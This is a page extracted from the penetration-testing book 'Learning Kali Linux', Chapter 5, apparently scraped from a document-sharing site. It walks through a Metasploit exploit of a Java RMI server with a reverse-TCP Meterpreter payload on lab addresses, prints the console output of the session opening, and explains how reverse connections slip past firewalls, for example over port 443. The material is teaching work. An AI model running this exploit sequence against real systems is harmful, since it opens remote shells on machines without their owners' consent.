| Chapter 5: Automated Exploits




Download 22,59 Mb.
Pdf ko'rish
bet156/225
Sana14.05.2024
Hajmi22,59 Mb.
#232856
1   ...   152   153   154   155   156   157   158   159   ...   225
Bog'liq
learningkalilinux

166 | Chapter 5: Automated Exploits

What you end up with after the exploit has occurred is based on the payload, and that
can be set after you have selected which exploit you want to run. As an example of
running an exploit while changing the payload in use, you can look at 
Example 5-18
.
This exploit targets the Java Remote Method Invocation (RMI) server, which is used
to provide interprocess communication, including across systems over a network.
Because we are exploiting a Java process, we’re going to use the Java implementation
of the Meterpreter payload.
Example 5-18. Using the Meterpreter payload
msf > use exploit/multi/misc/java_rmi_server
msf exploit
(
multi/misc/java_rmi_server
)

set 
payload java/meterpreter/reverse_tcp
payload
=
> java/meterpreter/reverse_tcp
msf exploit
(
multi/misc/java_rmi_server
)

set 
RHOST 192.168.86.147
RHOST
=
> 192.168.86.147
msf exploit
(
multi/misc/java_rmi_server
)

set 
LHOST 192.168.86.21
LHOST
=
> 192.168.86.21
msf exploit
(
multi/misc/java_rmi_server
)
> exploit
[
*
]
Exploit running as background job 0.
[
*
]
Started reverse TCP handler on 192.168.86.21:4444
msf exploit
(
multi/misc/java_rmi_server
)

[
*
]
192.168.86.147:1099 - Using URL:
http://0.0.0.0:8080/6XjLLZsheJ9
[
*
]
192.168.86.147:1099 - Local IP: http://192.168.86.21:8080/6XjLLZsheJ9
[
*
]
192.168.86.147:1099 - Server started.
[
*
]
192.168.86.147:1099 - Sending RMI Header...
[
*
]
192.168.86.147:1099 - Sending RMI Call...
[
*
]
192.168.86.147:1099 - Replied to request 
for
payload JAR
[
*
]
Sending stage 
(
53837
bytes
)
to 192.168.86.147
[
*
]
Meterpreter session 
1
opened 
(
192.168.86.21:4444 -> 192.168.86.147:36961
)
at
2018-01-24 21:13:26 -0700
You’ll see that in addition to setting the remote host, I’ve set the local host (
LHOST
).
This is necessary for the payload. You may notice that the payload name includes
reverse_tcp
. This is because after the exploit, the payload runs and initiates a connec‐
tion back to the attacking system. This is why it’s called 
reverse
, because the connec‐
tion comes back to the attacker rather than the other way around. This is useful, if
not essential, because the reverse connection will get around firewalls that will usually
allow connections outbound, especially if it happens over a well-known port. One of
the ports that is commonly used for these connections is 443. This is the SSL/TLS
port for encrypted web communications.

Download 22,59 Mb.
1   ...   152   153   154   155   156   157   158   159   ...   225




Download 22,59 Mb.
Pdf ko'rish